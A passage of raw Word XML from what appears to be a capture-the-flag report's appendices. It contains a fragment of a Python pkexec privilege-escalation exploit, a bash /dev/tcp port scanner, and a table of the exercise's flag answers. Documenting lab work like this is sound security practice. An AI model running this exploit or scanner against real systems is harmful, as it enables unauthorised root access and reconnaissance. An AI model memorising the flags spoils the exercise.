          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'GCONV_PATH=./exploit'</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6897BB"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0o0755</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t>os.mkdir(</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'exploit'</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8888C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>open</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6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'exploit/gconv-modules'</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6A8759"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'wb'</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>).write(</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>b'module  UTF-8//    INTERNAL    ../payload    2</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="CC7832"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'</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A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">environ_p = (c_char_p * </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="8888C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>len</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(environ))()</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>environ_p[:] = environ</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>libc.execve(</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A5C261"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>b'/usr/bin/pkexec'</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A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>c_char_p(</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="CC7832"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="CC7832"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsia="Times New Roman" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>environ_p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6351E9D8" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8"/>
    <w:p w14:paraId="447E6CA2" w14:textId="69A56E5B" w:rsidR="005111E1" w:rsidRDefault="005111E1">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nbnclient port scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413D637E" w14:textId="77777777" w:rsidR="005111E1" w:rsidRPr="005111E1" w:rsidRDefault="005111E1" w:rsidP="005111E1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6A8759"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="CC7832"/>
        </w:rPr>
        <w:t xml:space="preserve">if </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:t>[ $</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:t># -ne 1 ]; then</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="808080"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6A8759"/>
        </w:rPr>
        <w:t>"Usage: $0 &lt;IP&gt;"</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6A8759"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:t xml:space="preserve">exit </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6897BB"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6897BB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:t>fi</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:br/>
        <w:t>IP=$</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6897BB"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6897BB"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:t xml:space="preserve">echo </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6A8759"/>
        </w:rPr>
        <w:t>"Scanning ports for $IP..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18434583" w14:textId="6B053133" w:rsidR="005111E1" w:rsidRPr="005111E1" w:rsidRDefault="005111E1" w:rsidP="005111E1">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6A8759"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="CC7832"/>
        </w:rPr>
        <w:t xml:space="preserve">for </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:t xml:space="preserve">port </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="CC7832"/>
        </w:rPr>
        <w:t xml:space="preserve">in </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6897BB"/>
        </w:rPr>
        <w:t>1..65535</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:t>}; do</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    timeout </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6897BB"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:t xml:space="preserve">bash -c </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6A8759"/>
        </w:rPr>
        <w:t xml:space="preserve">"echo &gt;/dev/tcp/$IP/$port" </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6897BB"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;/dev/null &amp;&amp; echo </w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6A8759"/>
        </w:rPr>
        <w:t>"Port $port is open"</w:t>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="6A8759"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005111E1">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:color w:val="A9B7C6"/>
        </w:rPr>
        <w:t>done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685117BE" w14:textId="77777777" w:rsidR="005111E1" w:rsidRDefault="005111E1" w:rsidP="005111E1">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Toc153834536"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">APPENDIX </w:t>
      </w:r>
      <w:r>
        <w:t>C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>Flags</w:t>
      </w:r>
      <w:bookmarkEnd w:id="35"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9849" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2649"/>
        <w:gridCol w:w="7200"/>
      </w:tblGrid>
      <w:tr w:rsidR="005111E1" w14:paraId="0FC04985" w14:textId="77777777" w:rsidTr="0022617B">
        <w:trPr>
          <w:trHeight w:val="504"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2649" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E97CC0E" w14:textId="44E20322" w:rsidR="005111E1" w:rsidRPr="0022617B" w:rsidRDefault="005111E1" w:rsidP="0022617B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>Flag1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="607BFDB1" w14:textId="2A1B0C76" w:rsidR="005111E1" w:rsidRPr="0022617B" w:rsidRDefault="005111E1" w:rsidP="0022617B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>Flag1{cyberfellows_goodluck}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005111E1" w14:paraId="673C5A51" w14:textId="77777777" w:rsidTr="0022617B">
        <w:trPr>
          <w:trHeight w:val="725"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2649" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5ED11B1A" w14:textId="03C9DF66" w:rsidR="005111E1" w:rsidRPr="0022617B" w:rsidRDefault="005111E1" w:rsidP="0022617B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>Flag2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17099F98" w14:textId="658363B0" w:rsidR="005111E1" w:rsidRPr="0022617B" w:rsidRDefault="005111E1" w:rsidP="0022617B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>Flag2{down_a_rabbithole}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005111E1" w14:paraId="08232D8A" w14:textId="77777777" w:rsidTr="0022617B">
        <w:trPr>
          <w:trHeight w:val="725"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2649" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1161B5F0" w14:textId="68CB372E" w:rsidR="005111E1" w:rsidRPr="0022617B" w:rsidRDefault="005111E1" w:rsidP="0022617B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>Flag</w:t>
            </w:r>
            <w:r w:rsidRPr="0022617B">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C8D69DD" w14:textId="61658BE9" w:rsidR="005111E1" w:rsidRPr="0022617B" w:rsidRDefault="005111E1" w:rsidP="0022617B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>Flag3{brilliantly_lit_boulevard}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005111E1" w14:paraId="1DD33D6A" w14:textId="77777777" w:rsidTr="0022617B">
        <w:trPr>
          <w:trHeight w:val="725"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2649" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4896AA20" w14:textId="3BBBB914" w:rsidR="005111E1" w:rsidRPr="0022617B" w:rsidRDefault="005111E1" w:rsidP="0022617B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>Flag</w:t>
            </w:r>
            <w:r w:rsidRPr="0022617B">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="570960CB" w14:textId="095775CA" w:rsidR="005111E1" w:rsidRPr="0022617B" w:rsidRDefault="005111E1" w:rsidP="0022617B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidRPr="0022617B">
              <w:t>lag4{youre_going_places}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005111E1" w14:paraId="7C17C802" w14:textId="77777777" w:rsidTr="0022617B">
        <w:trPr>
          <w:trHeight w:val="725"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2649" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4BE7D40A" w14:textId="4F976CC1" w:rsidR="005111E1" w:rsidRPr="0022617B" w:rsidRDefault="005111E1" w:rsidP="0022617B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>Flag</w:t>
            </w:r>
            <w:r w:rsidRPr="0022617B">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="17BE56E2" w14:textId="0A8F16A7" w:rsidR="005111E1" w:rsidRPr="0022617B" w:rsidRDefault="005111E1" w:rsidP="0022617B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>F</w:t>
            </w:r>
            <w:r w:rsidRPr="0022617B">
              <w:t>lag5{weve_always_done_it_this_way}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005111E1" w14:paraId="2AE19599" w14:textId="77777777" w:rsidTr="0022617B">
        <w:trPr>
          <w:trHeight w:val="725"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2649" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0C537765" w14:textId="2C72845E" w:rsidR="005111E1" w:rsidRPr="0022617B" w:rsidRDefault="005111E1" w:rsidP="0022617B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>Flag7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="79180E18" w14:textId="7A7BD88D" w:rsidR="005111E1" w:rsidRPr="0022617B" w:rsidRDefault="005111E1" w:rsidP="0022617B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>flag7{worlds_within_worlds</w:t>
            </w:r>
            <w:r w:rsidRPr="0022617B">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005111E1" w14:paraId="6B0782B0" w14:textId="77777777" w:rsidTr="0022617B">
        <w:trPr>
          <w:trHeight w:val="725"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2649" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D33AB70" w14:textId="70DDB015" w:rsidR="005111E1" w:rsidRPr="0022617B" w:rsidRDefault="005111E1" w:rsidP="0022617B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>Flag</w:t>
            </w:r>
            <w:r w:rsidRPr="0022617B">
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7200" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="12448DFB" w14:textId="679383F9" w:rsidR="005111E1" w:rsidRPr="0022617B" w:rsidRDefault="005111E1" w:rsidP="0022617B">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="0022617B">
              <w:t>flag8{escape_the_metaverse}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="60724141" w14:textId="015CCBB1" w:rsidR="00600A48" w:rsidRDefault="00600A48" w:rsidP="00600A48">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="36" w:name="_Toc153834537"/>
      <w:r>
        <w:t xml:space="preserve">APPENDIX </w:t>
      </w:r>
      <w:r>
        <w:t>D</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:t>Resources</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9849" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2649"/>
        <w:gridCol w:w="7200"/>
      </w:tblGrid>
      <w:tr w:rsidR="0022617B" w:rsidRPr="0022617B" w14:paraId="74CAA431" w14:textId="77777777" w:rsidTr="0022617B">
        <w:trPr>
          <w:trHeight w:val="504"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2649" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
